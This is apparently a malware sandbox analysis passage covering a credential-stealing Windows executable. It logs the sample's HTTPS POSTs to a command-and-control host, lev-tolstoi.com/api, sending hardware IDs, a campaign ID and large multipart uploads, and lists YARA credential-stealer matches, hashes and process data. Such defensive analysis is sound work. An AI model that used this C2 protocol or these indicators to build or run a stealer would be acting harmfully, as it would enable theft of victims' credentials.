                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATWwGGbz32A0mR6w2mYMrFDFEoOkVeovqziN6fnVcZfGF1B9b0Ld90oFYe4FRKH954nBS%2B2FAeH14zDtoVDYo04MPUdxHZTbZdEDbNBJ5eejnUgyfKmi02gzXLwbchPPh98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66da919c4642dc-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1549&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1759036&cwnd=251&unsent_bytes=0&cid=12f1ef1e9c8b9465&ts=742&x=0"
2024-12-23 08:06:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 08:06:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:44 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-23 08:06:44 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-23 08:06:44 UTC | 1117 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:44 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8uhemp4ijk7tanenba6bs8kqdl; expires=Fri, 18 Apr 2025 01:53:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dBmmSbNzKffnp0WafOk3yPHA9lzPa00ao1cf0QdQunkfPHc3yuTmN6jk9XBjbqRMdFpYd4zr2QOkSZ38FIA8PMsktqXKiKyBVPHTp1ICqEVdWN82mD3g4aDu2UUAiWrTBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66daa00d5ede9b-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1476&rtt_var=555&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1968981&cwnd=192&unsent_bytes=0&cid=8a730840ccd2e4ff&ts=773&x=0"
                                                                                                                                                                                                                                              Data Ascii: EhNyWl+KUqRyETVNsreKOLnr3+DaP9gr5xXyoD3qRXiDwCHdTlnG5aFFshwkfFr7ZmuFs13vi7/vluLoMaeOpE9DY56KGEd2YR48RGJhmujmckKwy/6Z//TCNf1lNt8jEgcx2J+Z0qOmRiHIomQa+Lag0qLbOh1+LVmoqDGiT3MFw+oeC97NOjeVck+zt465ZfRV803xzb3y2fL7tnIc5wvAId1OWcbm+xYwDHf2Cap+JJJhy+wNrnLANfggYw6


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:46 UTC | 271 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=IN3K5IA4
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 18103
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-23 08:06:46 UTC | 15331 | OUT | Data Ascii: --IN3K5IA4Content-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--IN3K5IA4Content-Disposition: form-data; name="pid"2--IN3K5IA4Content-Disposition: form-data; name="lid"PsFKDg--pablo--IN3K5IA4Content-Disposit
2024-12-23 08:06:47 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:47 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=p4ptbdjcdragco4cpa1khlt2dc; expires=Fri, 18 Apr 2025 01:53:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j3QJcFaCGDdzizs6EYHCLWwNt1exOtUwNdSSDOarYjXQum75X2O7ifb7c7rJlB7ePnFEOh5jbWkBHcLXd8Izb29NtkABD3HOr1hbX2un2mk56knU8vPTOTDtm6qJP0N6qhk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66daae0a654363-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1563&rtt_var=600&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19054&delivery_rate=1801357&cwnd=237&unsent_bytes=0&cid=5e09281a89ed7d48&ts=949&x=0"
2024-12-23 08:06:47 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:06:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:48 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=V2KVRS1ZQKT53LIW
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8772
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-23 08:06:48 UTC | 8772 | OUT | Data Ascii: --V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="pid"2--V2KVRS1ZQKT53LIWContent-Disposition: form-data; name="lid"PsFKDg--pablo--V2
2024-12-23 08:06:49 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:49 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1dt3n6j7tjba1qe7hjknkqg60e; expires=Fri, 18 Apr 2025 01:53:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hZN%2Bop9WNM76NGbTSPQ7SlWlwAbJeU3bk4doLeKR2ss276Kz9ywxVW0wMfvhqSLysJvwoztypqN0rc53W0vGSlTIVUV5pVe5qwfZafP0A7uJmO1%2Bb%2Flu7C6%2FXOjxYIlDXI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dabc292d4273-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2415&min_rtt=2347&rtt_var=929&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9708&delivery_rate=1244141&cwnd=229&unsent_bytes=0&cid=d778235c36f061a6&ts=664&x=0"
2024-12-23 08:06:49 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 08:06:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:50 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=4LYW44T8B2H
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 20395
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-23 08:06:50 UTC | 15331 | OUT | Data Ascii: --4LYW44T8B2HContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--4LYW44T8B2HContent-Disposition: form-data; name="pid"3--4LYW44T8B2HContent-Disposition: form-data; name="lid"PsFKDg--pablo--4LYW44T8B2HCont
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:51 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=jvaqh508hre4kj3v1ijd9mmo8s; expires=Fri, 18 Apr 2025 01:53:30 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBx3ZpKD5Poho0ZoMpMHs44BJPl22xUTAF5nBpebJBqvtKYH9Zcmuo6Lg4jNihlGtjDCcIA7lDNZQknh9nWLom1NX%2FeHiekxkDgineEaw6extgy7uhEFForZM0kgfGPJfz4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dac93d5943f2-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1741&rtt_var=654&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21349&delivery_rate=1673352&cwnd=207&unsent_bytes=0&cid=004fbc244ee9c71b&ts=1128&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              2024-12-23 08:06:53 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=C07PW8AQYBH82R
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 1233
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:53 UTC1233OUTData Raw: 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 30 37 50 57 38 41 51 59 42 48 38 32 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 43 30 37 50 57 38 41 51
                                                                                                                                                                                                                                              Data Ascii: --C07PW8AQYBH82RContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--C07PW8AQYBH82RContent-Disposition: form-data; name="pid"1--C07PW8AQYBH82RContent-Disposition: form-data; name="lid"PsFKDg--pablo--C07PW8AQ
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:54 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=c8cp4nr0eckciv8opgdk3o1llj; expires=Fri, 18 Apr 2025 01:53:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQFSpwR0cwnqGFD8Pgug54uElLrIF4cWXhdy%2BGrZ3V1HKnR%2FT1UhwIMzDfrgg%2BOPxMegS1%2Ff3uVnAaRGlpTWFlo1%2FYidcAVRiPuTtm8xh%2B17RfRvHeUS6siv49ofKnXl%2F1g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66dadabbd1c341-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1492&rtt_var=578&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2145&delivery_rate=1861057&cwnd=177&unsent_bytes=0&cid=d33acdd429bd0197&ts=831&x=0"
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                              2024-12-23 08:06:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              2024-12-23 08:06:56 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=83ZR4JYWYD19B9Z
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 568739
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                              2024-12-23 08:06:56 UTC15331OUTData Raw: 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 36 35 46 33 42 39 46 30 41 41 39 30 31 37 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 33 5a 52 34 4a 59 57 59 44 31 39 42 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 33 5a 52 34
                                                                                                                                                                                                                                              Data Ascii: --83ZR4JYWYD19B9ZContent-Disposition: form-data; name="hwid"5965F3B9F0AA9017AC8923850305D13E--83ZR4JYWYD19B9ZContent-Disposition: form-data; name="pid"1--83ZR4JYWYD19B9ZContent-Disposition: form-data; name="lid"PsFKDg--pablo--83ZR4
                                                                                                                                                                                                                                              Data Ascii: Wsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6E
2024-12-23 08:07:00 UTC 1139 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=s8vr8uku4tku7q3obt4q8hf8m4; expires=Fri, 18 Apr 2025 01:53:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DMi%2FhZYi6rFlljIUBhY%2BevBdNBoSRlkuoyrUsS%2FC7tzf9GzuoNDC0PM%2F%2BOzvntpbLP7yIoeUcMKH8W3YHy6qLxrT9eEH2g%2B3X%2Bok8RCGIQkHk86URcQJe6OsvZ96k9258O8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f66daeb5f404369-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2887&min_rtt=2514&rtt_var=1690&sent=199&recv=589&lost=0&retrans=0&sent_bytes=2835&recv_bytes=571282&delivery_rate=530426&cwnd=234&unsent_bytes=0&cid=7d9c679ca1095136&ts=3743&x=0"



                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:03:06:33
                                                                                                                                                                                                                                              Start date:23/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\LNn56KMkEE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\LNn56KMkEE.exe"
                                                                                                                                                                                                                                              Imagebase:0x4a0000
                                                                                                                                                                                                                                              File size:1'866'752 bytes
                                                                                                                                                                                                                                              MD5 hash:5F8D5C992633D84420477157CB75F8AE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1846125522.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1845589560.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1844526538.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1846392780.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1844241993.0000000001010000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1845356512.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1845854080.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1844241993.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1844004127.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1845086320.0000000001044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000003.1845589560.0000000001010000.00000004.00000020.00020000.00000000.sdmp, Offset: 0100F000, based on PE: false
• Associated: 00000000.00000003.1844004127.000000000100F000.00000004.00000020.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_100f000_LNn56KMkEE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                                                                                                • Instruction ID: 1e4f80bbeeaaa3c3da7e8e08679d05b773819494efa39cbec42848ea2d18b763
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f24193477ecd1b712cfbb67819523358227fe270f55fbee1a73888caff6372c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B22104651092D58FD307CF78D594A82BFA2FF8B71639E40DCC9C19F427C2A56542CB52